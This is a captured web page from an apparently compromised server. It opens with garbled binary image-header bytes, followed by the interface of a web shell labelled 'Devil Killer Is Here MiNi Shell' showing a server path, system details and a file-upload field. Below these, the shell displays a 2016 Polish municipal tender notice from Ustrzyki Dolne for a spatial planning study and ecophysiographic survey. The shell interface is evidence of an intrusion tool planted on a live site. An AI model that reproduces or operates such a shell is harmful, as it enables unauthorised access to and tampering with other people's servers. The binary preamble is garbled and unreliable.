JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160616/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160616/90239-N-2016.html

<p class="kh_header"><b>Ustrzyki Dolne: Opracowanie Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ustrzyki Dolne wraz z inwentaryzacją przyrodniczą i ekofizjografią.</b><br>
<b>Numer ogłoszenia: 90239 - 2016; data zamieszczenia: 16.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ustrzyki Dolne , ul. Mikołaja Kopernika 1, 38-700 Ustrzyki Dolne, woj. podkarpackie, tel. 013 460-80-00, faks 013 460-80-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ustrzyki-dolne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ustrzyki Dolne wraz z inwentaryzacją przyrodniczą i ekofizjografią..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I. Ekofizjografii dla Gminy Ustrzyki Dolne, zgodnie z przepisami ustawy 
z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t. j. Dz. U. z 2016r., poz. 672) oraz Rozporządzeniem Ministra Środowiska z dnia 9 września 2002r. 
w sprawie opracowań ekofizjograficznych (Dz. U. z 2002r. Nr 155,oz. 1298), przy czym część graficzna opracowana na mapach topograficznych w skali 1:10000 wraz z inwentaryzacją przyrodniczą.
CZĘŚĆ II. Projektu Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Ustrzyki Dolne.
4.4	Zakres rzeczowy:
4.4.1.	W ramach prac planistycznych Wykonawca zobowiązany będzie do wykonania:
a.	opracowania ekofizjograficznego (nowe opracowanie) wraz z inwentaryzacją przyrodniczą;
a.	uchwały o przystąpieniu do opracowania studium
b.	wystąpień do instytucji opiniujących i uzgadniających, obwieszczenia (ogłoszenia) o przystąpieniu do sporządzenia studium
c.	publikacji ogłoszenia w prasie miejscowej 
d.	wykazu odpowiedzi i stanowisk organów i instytucji określonych ustawą, zawiadomionych o podjęciu uchwały o przystąpieniu do sporządzenia studium wraz z ich analizą;
e.	koncepcji studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (roboczy projekt studium uwarunkowań i kierunków zagospodarowania przestrzennego), z wariantami rozwiązań
f.	prognozy oddziaływania na środowisko;
g.	projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego, uwzględniający uwagi Zamawiającego (wersja do opiniowania i uzgodnień);
h.	wykazu uzyskanych opinii i uzgodnień wraz z ich analizą;
i.	projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego, uwzględniającego opinie i uzgodnienia (wersja do wyłożenia do publicznego wglądu);
j.	wykazu i informacji graficznej dotyczącej uwag wniesionych do projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego wyłożonego do publicznego wglądu wraz z prognozą oddziaływania na środowisko, z propozycją ich rozstrzygnięcia. Propozycje rozstrzygnięcia winny zawierać uzasadnienie sposobu rozpatrzenia każdej z uwag (z wyłączeniem uwag uwzględnionych 
w całości);
k.	projektu zarządzenia burmistrza w sprawie rozpatrzenia uwag;
l.	projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz prognozę oddziaływania na środowisko (o ile zajdzie taka potrzeba), 
z uwzględnieniem zmian wynikających z rozstrzygnięcia uwag;
m.	wykazu opinii do projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego, którego wzór określa załącznik nr 4 do Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. 
z 2004 r. Nr 118, poz. 1233);
n.	protokołu z dyskusji publicznej nad przyjętymi w projekcie studium rozwiązaniami, którego wzór określa załącznik nr 6 do Rozporządzenia Ministra Infrastruktury 
z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań 
i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r. Nr 118, poz. 1233);
o.	rozstrzygnięcia o sposobie rozpatrzenia uwag do projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego z uzasadnieniem faktycznym 
i prawnym, dotyczącym uwag nieuwzględnionych w części lub całości;
p.	wykazu materiałów planistycznych, o których mowa w § 3 ust. 1 Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r. Nr 118, poz. 1233), wraz z wnioskami wynikającymi z ich analizy;
q.	wykazu materiałów planistycznych, o których mowa w § 3 ust. 2 Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r. Nr 118, poz. 1233);
r.	dokumentacji prac planistycznych, o której mowa w art. 12 ust. 2 ustawy 
z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778);
s.	uzasadnienia zawierającego objaśnienia przyjętych rozwiązań oraz syntezę ustaleń projektu studium;
t.	projektu podsumowania, o którym mowa w art. 55 ust. 3 ustawy z dnia 
3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2016 r. poz. 353);
u.	opracowania merytorycznego dokumentów formalno-prawnych, projekty pism, obwieszczeń i ogłoszeń, wynikających z art. 11 ustawy o planowaniu 
i zagospodarowaniu przestrzennym;
4.4.2.	W ramach prac planistycznych Wykonawca zobowiązany będzie do następujących czynności:
a.	udziału w posiedzeniach odpowiednich Komisji Rady Miejskiej, Sesji Rady Miejskiej, Miejskiej Komisji Urbanistyczno - Architektonicznej i innych wskazanych przez Zamawiającego wraz z prezentacją (multimedialną) projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego;
b.	udziału, w zależności od potrzeb, w spotkaniach dotyczących uzgodnień 
i opiniowania projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego oraz innych czynnościach procedury planistycznej;
c.	udziału w dyskusji publicznej nad rozwiązaniami przyjętymi w projekcie studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy oraz 
w spotkaniach z mieszkańcami, organizowanych przez Zamawiającego;
d.	współpracy w przygotowaniu ewentualnych stanowisk (opinii) Burmistrza podczas procedury sporządzania studium uwarunkowań i kierunków zagospodarowania przestrzennego;
e.	w zależności od potrzeb, udział w innych spotkaniach konsultacyjnych organizowanych w związku ze sporządzaniem studium uwarunkowań 
i kierunków zagospodarowania przestrzennego. Zamawiający zobowiązuje Wykonawcę do przygotowania odpowiednich materiałów planistycznych 
w porozumieniu z Zamawiającym;
f.	wykonania wszelkich prac projektowych i dokumentacyjnych nie opisanych powyżej, a wynikających z procedur określonych aktami prawnymi właściwymi dla opracowania dokumentu studium uwarunkowań i kierunków zagospodarowania przestrzennego.
4.4.3.	W ramach ewentualnego postępowania nadzorczego Wykonawca zobowiązany będzie do:
a.	edycji opracowań na potrzeby postępowania nadzorczego oraz udziału 
w czynnościach niezbędnych do ewentualnego doprowadzenia studium do zgodności z przepisami prawa, w sytuacji rozstrzygnięcia nadzorczego lub stwierdzenia nieważności uchwały przez Wojewodę;
b.	współpracy w przygotowaniu odpowiedzi na pisma Wojewody związane 
z postępowaniem.
4.4.4.	Wykonawca zobowiązany będzie do ponownego wykonania poszczególnych czynności i przygotowania materiałów w ramach procedury planistycznej, wynikających z rozstrzygnięć uwag składanych do projektu studium przez Burmistrza i Radę Miejską, do chwili uchwalenia studium uwarunkowań i kierunków zagospodarowania przestrzennego.
4.4.5.	W ramach realizacji przedmiotu zamówienia Wykonawca sporządzi 
i przekaże Zamawiającemu:
4.4.5.1.	Studium uwarunkowań i kierunków zagospodarowania przestrzennego:
a.	rysunek w skali 1:5000 winien zostać przekazany w wersji tradycyjnej (papierowej) w kolorze oraz w barwach czarno-białych w pięciu egzemplarzach (po 1 czarno-białe i 4 kolorowe), a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: TIFF i JPG;
b.	tekst dokumentu winien zostać przekazany w wersji tradycyjnej (papierowej) 
w pięciu egzemplarzach, a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: DOC, DOCX, PDF;
c.	dane przestrzenne oraz metadane w formie elektronicznej, winny zostać opracowane zgodnie z założeniami Dyrektywy 2007/2/WE Parlamentu Europejskiego i Rady z dnia 14 marca 2007 r. ustanawiającej infrastrukturę informacji przestrzennej we Wspólnocie Europejskiej (INSPIRE) (Dz.U.UE.L.2007.108.1) oraz ustawy z dnia 4 marca 2010r. o infrastrukturze informacji przestrzennej (Dz.U z 2010 r. Nr 76 poz. 489, ze zm.). Dane przestrzenne składające się na treść rysunku studium (dane wektorowe 
i rastrowe) winny zostać przekazane na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formacie *.dxf, *.dwg
4.4.5.2.	Opracowanie ekofizjograficzne:
a.	tekst dokumentu winien być przekazany w wersji tradycyjnej (papierowej) 
w dwóch egzemplarzach, a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: DOC, DOCX, PDF;
b.	załączniki graficzne winny być przekazane w wersji tradycyjnej (papierowej) 
w kolorze w dwóch egzemplarzach, a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: TIFF i JPG;
c.	dane przestrzenne winny być przekazane w postaci plików w formacie SHP dla danych wektorowych, plików w formacie GeoTIFF dla danych rastrowych oraz plików w innych formatach dla danych przestrzennych, których nie można sporządzić w formatach SHP lub GeoTIFF lub dla danych tych stosuje się powszechnie inny format. Pliki te winny być logicznie uporządkowane 
i nazwane;
d.	pliki zawierające projekt opracowania, na które składają się zgodne z wersją papierową i elektroniczną rysunku, odpowiednio uporządkowane i wyświetlone treści mapy (dane przestrzenne zgromadzone w warstwach tematycznych).
4.4.5.3.	Inwentaryzację przyrodniczą winna być przekazana w wersji tradycyjnej (papierowej) w dwóch egzemplarzach, a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: DOC, DOCX, PDF. W przypadku, gdyby prognoza zawierała część graficzną, należy przekazać opracowania kartograficzne oraz dane przestrzenne na zasadach analogicznych jak w przypadku opracowania ekofizjograficznego.
4.4.5.4.	Prognozę oddziaływania na środowisko, która winna być przekazana 
w wersji tradycyjnej (papierowej) w dwóch egzemplarzach, a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: DOC, DOCX, PDF. W przypadku, gdyby prognoza zawierała część graficzną, należy przekazać opracowania kartograficzne oraz dane przestrzenne na zasadach analogicznych jak w przypadku opracowania ekofizjograficznego.
4.4.5.5.	Dokumentacja prac planistycznych winna zostać przekazana w wersji tradycyjnej (papierowej) w dwóch egzemplarzach, odpowiednio poukładana 
i spięta.
4.4.5.6.	Forma pozostałych opracowań:
a.	opracowania tekstowe (np. wykazy, protokoły, stanowiska) winny być przekazane w wersji tradycyjnej (papierowej), a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: DOC, DOCX, PDF.
b.	opracowania analityczne (np. zawierające dane liczbowe, wykresy) winny być przekazane w wersji tradycyjnej (papierowej), a także na nośniku elektronicznym (płyta CD/DVD, dysk wymienny na złącze USB) w formatach: XLS, XLSX.
c.	Ewentualna dokumentacja fotograficzna winna być przekazana w formie cyfrowej w formacie: JPG lub podobnym.
4.4.6.	Ponadto w ramach przedmiotu zamówienia Wykonawca zobowiązany jest do bieżącego przygotowywania i przekazywania dokumentów (do momentu uzyskania ostatecznej ich wersji) na poszczególnych etapach procedury planistycznej, zgodnie z wytycznymi zawartymi w pkt 4.4.5, 
z zastrzeżeniem:
d.	braku obowiązku przekazywania danych przestrzennych oraz metadanych;
e.	obowiązku przekazywania dokumentów w wersji tradycyjnej (papierowej) 
w dwóch egzemplarzach.
4.4.7.	Zamawiający przekaże Wykonawcy wszelkie informacje oraz materiały znajdujące się w jego posiadaniu (z wyłączeniem danych nie mogących być przedmiotem udostępnienia), a mogące służyć do opracowania przedmiotu zamówienia.
4.4.8.	Wykonawca zobowiązany jest do pozyskania wszelkich materiałów niezbędnych do wykonania przedmiotu umowy, a nie udostępnionych przez Zamawiającego - w tym m.in. aktualnych materiałów i danych pochodzących z państwowego zasobu geodezyjnego i kartograficznego.
4.4.9.	Zamawiający dopuszcza rozliczenie wykonanego przedmiotu zamówienia w częściach wynikających z harmonogramu prac i płatności.
f.	Ogólny harmonogram prac i płatności:
I.	Faza I (maksymalnie 14 miesięcy; maksymalna płatność 35% całkowitego wynagrodzenia) 
Analizy i koncepcja studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (roboczy projekt studium uwarunkowań i kierunków zagospodarowania przestrzennego), składające się z czynności:
a.	wykonanie opracowania ekofizjograficznego wraz z inwentaryzacją przyrodniczą (forma graficzna i opisowa) - płatność 10% całkowitego wynagrodzenia;
b.	przygotowanie uchwały o przystąpieniu do opracowania studium 
c.	zebranie i opracowanie materiałów wejściowych niezbędnych dla opracowania koncepcji studium w części dotyczącej uwarunkowań zagospodarowania przestrzennego;
d.	przedłożenie Zamawiającemu koncepcji studium w części dotyczącej uwarunkowań zagospodarowania przestrzennego - płatność 10% całkowitego wynagrodzenia;
e.	analiza wniosków określonych w art. 11 pkt 1 ustawy o planowaniu 
i zagospodarowaniu przestrzennym wraz z opracowaniem wykazu odpowiedzi i stanowisk organów i instytucji określonych ustawą, zawiadomionych 
o podjęciu uchwały o przystąpieniu do sporządzenia studium wraz z ich analizą - płatność 5% całkowitego wynagrodzenia;
f.	przedłożenie Zamawiającemu koncepcji studium w części dotyczącej kierunków zagospodarowania przestrzennego, z wariantami rozwiązań - płatność 10% całkowitego wynagrodzenia.
II.	Faza II (maksymalnie 4 miesiące; płatność 10% całkowitego wynagrodzenia) Uzgodnienie przez Zamawiającego przyjętych rozwiązań dotyczących studium 
w zakresie uwarunkowań i kierunków zagospodarowania przestrzennego.
III.	Faza III (maksymalnie 3 miesiące; maksymalna płatność 20% całkowitego wynagrodzenia) 
Opiniowanie i uzgodnienia projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego, składające się z czynności:
a.	przedłożenie Zamawiającemu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego, w wersji gotowej do opiniowania 
i uzgodnień wraz z prognozą oddziaływania na środowisko - płatność 10% całkowitego wynagrodzenia.
b.	przedłożenie Zamawiającemu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego wraz z prognozą oddziaływania na środowisko, uwzględniających opinie i uzgodnienia - płatność 10% całkowitego wynagrodzenia.
IV.	Faza IV (maksymalnie 8 miesięcy; maksymalna płatność 10% całkowitego wynagrodzenia) 
Wyłożenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego do publicznego wglądu, składające się z czynności:
a.	uczestniczenie Wykonawcy w dyskusji publicznej nad przyjętymi w projekcie studium rozwiązaniami wraz z przedłożeniem Zamawiającemu protokołu 
z dyskusji.
b.	przedłożenie Zamawiającemu wykazu i informacji graficznej dotyczącej uwag wniesionych do projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego wyłożonego do publicznego wglądu wraz 
z prognozą oddziaływania na środowisko, z propozycją ich rozstrzygnięcia - płatność 5% całkowitego wynagrodzenia;
c.	przedłożenie Zamawiającemu projektu zarządzenia Burmistrza w sprawie rozpatrzenia uwag - płatność 5% całkowitego wynagrodzenia;
d.	wprowadzenie do opracowań zmian wynikających ze sposobu rozpatrzenia uwag i przygotowanie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego do kolejnej fazy.
V.	Faza V (maksymalnie 1 miesiąc; maksymalna płatność 10% całkowitego wynagrodzenia)
Prace końcowe, składające się z czynności:
a.	przygotowanie uchwały (tekst uchwały, załączniki w postaci tekstu i rysunku studium uwarunkowań i kierunków zagospodarowania przestrzennego) do zatwierdzenia przez Radę Miejska- płatność 5% całkowitego wynagrodzenia.
b.	Przedłożenie Zamawiającemu projektu podsumowania, o którym mowa w art. 55 ust. 3 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji 
o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2016 r. poz. 353);
c.	Przekazanie Zamawiającemu skompletowanej dokumentacji planistycznej do przekazania Wojewodzie celem sprawdzenia zgodności z prawem (termin 
4 dni od daty sesji Rady Miejskiej na której zostanie przyjęte studium uwarunkowań i kierunków zagospodarowania przestrzennego) - płatność 5% całkowitego wynagrodzenia.
VI.	Faza VI postępowanie nadzorcze Wojewody Podkarpackiego (termin realizacji 
w zależności od zajętego stanowiska; maksymalna płatność 15% po zakończeniu rzeczonej fazy)
a.	brak czynności do wykonania przez Wykonawcę w przypadku braku wskazania bądź braku rozstrzygnięcia nadzorczego Wojewody; płatność po upływie terminu koniecznego na przeprowadzenie postępowania nadzorczego (zgodnie z przepisami prawa)
albo
b.	edycja opracowań na potrzeby postępowania nadzorczego oraz udział 
w czynnościach niezbędnych do ewentualnego doprowadzenia studium do zgodności z przepisami prawa, w sytuacji rozstrzygnięcia nadzorczego lub stwierdzenia nieważności uchwały przez Wojewodę; płatność po ponownym przeprowadzeniu przez Wojewodę postępowania nadzorczego i braku wskazania bądź rozstrzygnięcia nadzorczego wojewody.
4.4.10.	W ramach realizacji przedmiotu zamówienia Wykonawca przeniesie wszelkie prawa autorskie do wszystkich materiałów wytworzonych:
1)	Wykonawca przenosi na Zamawiającego, w ramach wynagrodzenia określonego w ofercie, autorskie prawa majątkowe do utworów (w rozumieniu ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych) powstałych w wyniku wykonywania niniejszej umowy na wszelkich znanych 
w dniu zawarcia niniejszej umowy polach eksploatacji, w tym w szczególności wymienionych w art. 50 ustawy z 4 lutego 1994 o prawie autorskim i prawach pokrewnych (t. j. Dz. U. z 2016 r., poz. 666), tj.:
a.	w zakresie utrwalania i zwielokrotniania utworu - wytwarzanie bez żadnych ograniczeń ilościowych określoną techniką egzemplarzy utworu, w tym techniką drukarską, reprograficzną, zapisu magnetycznego, optyczną, laserową oraz techniką cyfrową, przez wprowadzania do pamięci komputera (w tym RAM, twardy dysk i serwer), w sieciach informatycznych - w tym typu Internet i Intranet - w szczególności on-line;
b.	w zakresie obrotu oryginałem albo egzemplarzami, na których utwór utrwalono - wprowadzenie do obrotu bez ograniczeń ilościowych, użyczenie lub najem oryginału lub egzemplarzy na dowolnym nośniku, na którym utwór utrwalono;
c.	w zakresie rozpowszechniania utworu w sposób inny niż określony 
w pkt 4.4.16.1)a. - publiczne wykonywanie, wystawienie, wyświetlenie, odtworzenie oraz nadawania i reemitowanie, a także publiczne udostępnianie utworu, w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu 
i w czasie przez siebie wybranym, w tym w szczególności za pośrednictwem sieci informatycznych - typu Internet lub Intranet, on-line, na stronach internetowych oraz w ramach komunikacji na życzenie;
d.	w zakresie modyfikacji całości lub części utworu - prawo do korekt, zmian, przeróbek, prawo do łączenia całości lub fragmentów z innymi utworami.
2)	Wykonawca, w ramach wynagrodzenia określonego w ofercie, zobowiązuje się do przeniesienia na Zamawiającego wyłącznego prawa zezwalania na wykonywanie zależnego prawa autorskiego do utworów powstałych 
w wykonaniu niniejszej umowy, tj. prawo do korzystania i rozporządzania opracowaniami utworów oraz udzielania zezwoleń na korzystanie 
i rozporządzanie opracowaniami utworów.
3)	Wraz z przeniesieniem majątkowych praw autorskich do utworów, w ramach wynagrodzenia określonego w ofercie, Wykonawca zobowiązuje się przenieść na Zamawiającego prawo własności nośnika, na którym zostaną utrwalone poszczególne utwory.
4)	Przejście majątkowych praw autorskich do utworów, prawa zezwalania na wykonywanie zależnego prawa autorskiego do utworów oraz prawa własności nośników, na których zostaną utrwalone poszczególne utwory na Zamawiającego nastąpi w dniu przekazania Zamawiającemu przez Wykonawcę poszczególnych nośników z utworami.
5)	Przejście majątkowych praw autorskich, o którym mowa w pkt 4.4.15.1), oraz prawa zezwalania na wykonywanie zależnego prawa autorskiego, o którym mowa w pkt. 4.4.15.2)., nastąpi bez ograniczeń czasowych i terytorialnych. 
6)	Wykonawca zobowiązuje się wobec Zamawiającego, że nie będzie wykonywał osobistych praw autorskich do utworów oraz upoważnia Zamawiającego do podjęcia w jego imieniu decyzji o terminie i sposobie pierwszego udostępnienia poszczególnych utworów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 5.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy
1)	spełniają warunki art. 22 ust. 1 uPzp dotyczące
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b)	posiadania wiedzy i doświadczenia
c)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
d)	sytuacji ekonomicznej i finansowej
2)	nie podlegają wykluczeniu na podstawie art. 24 ust. 1, 2 i 2a uPzp
3)	przedstawią dokumenty i oświadczenia stwierdzające spełnianie stawianych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
